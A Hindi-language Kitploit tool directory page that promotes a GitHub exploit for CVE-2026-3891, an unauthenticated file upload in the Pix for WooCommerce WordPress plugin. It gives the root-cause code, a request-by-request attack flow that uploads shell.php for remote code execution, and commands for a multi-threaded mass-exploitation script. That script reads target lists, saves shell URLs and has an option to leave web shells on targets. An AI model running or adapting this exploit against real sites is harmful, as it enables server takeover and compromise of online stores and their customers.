Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3891 — Pix for WooCommerce में certificate_crt_path पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-3891
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce में certificate_crt_path पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड | CVSS 9.8

रिपॉजिटरी देखें
4192 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-3891 — Pix for WooCommerce अप्रमाणित फ़ाइल अपलोड RCE

Nonce लीक → certificate_crt_path अपलोड → कोड निष्पादन


अवलोकन

CVE-2026-3891 एक गंभीर-स्तर (CVSS 9.8) अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता है Pix for WooCommerce WordPress प्लगइन (linknacional द्वारा) संस्करणों में ≤ 1.5.0।

lkn_pix_for_woocommerce_c6_save_settings AJAX हैंडलर में:

  1. कोई क्षमता जांच नहीं — कोई भी अप्रमाणित आगंतुक इसे कॉल कर सकता है
  2. कोई फ़ाइल प्रकार सत्यापन नहीं — certificate_crt_path पैरामीटर के माध्यम से कोई भी फ़ाइल एक्सटेंशन स्वीकार किया जाता है
  3. एक वैध nonce स्वतंत्र रूप से प्राप्त किया जा सकता है बिना प्रमाणीकरण के lkn_pix_for_woocommerce_generate_nonce endpoint के माध्यम से

अपलोड की गई फ़ाइलें वेब-सुलभ निर्देशिका /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/ में रखी जाती हैं।

प्रभावित संस्करण

संस्करणस्थिति
≤ 1.5.0असुरक्षित
1.6.0+पैच किया गया

खोजकर्ता: Wordfence के माध्यम से Alexis Lafontaine (13 मार्च, 2026)


भेद्यता तंत्र

मूल कारण

// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

हमला प्रवाह

1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → वैध nonce प्राप्त करें (कोई प्रमाणीकरण आवश्यक नहीं)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → certificate_crt_path फ़ील्ड के माध्यम से shell.php अपलोड करें
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

स्थापना

git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

उपयोग

python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

तर्क

  -t, --target      एकल लक्ष्य
  -f, --file        लक्ष्य सूची
  -o, --output      RCE URL सहेजें
  --threads         कार्यकर्ता (डिफ़ॉल्ट: 30)
  --no-cleanup      लक्ष्य पर शेल छोड़ें
  --debug           प्रत्येक अनुरोध दिखाएँ
  -v, --verbose     विस्तृत आउटपुट

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।


संदर्भ

संसाधनलिंक
Wordfence सलाहwordfence.com
NVD प्रविष्टिCVE-2026-3891
शोधकर्ताAlexis Lafontaine

linknacional या Pix for WooCommerce से संबद्ध नहीं है।

टूल डाउनलोड करें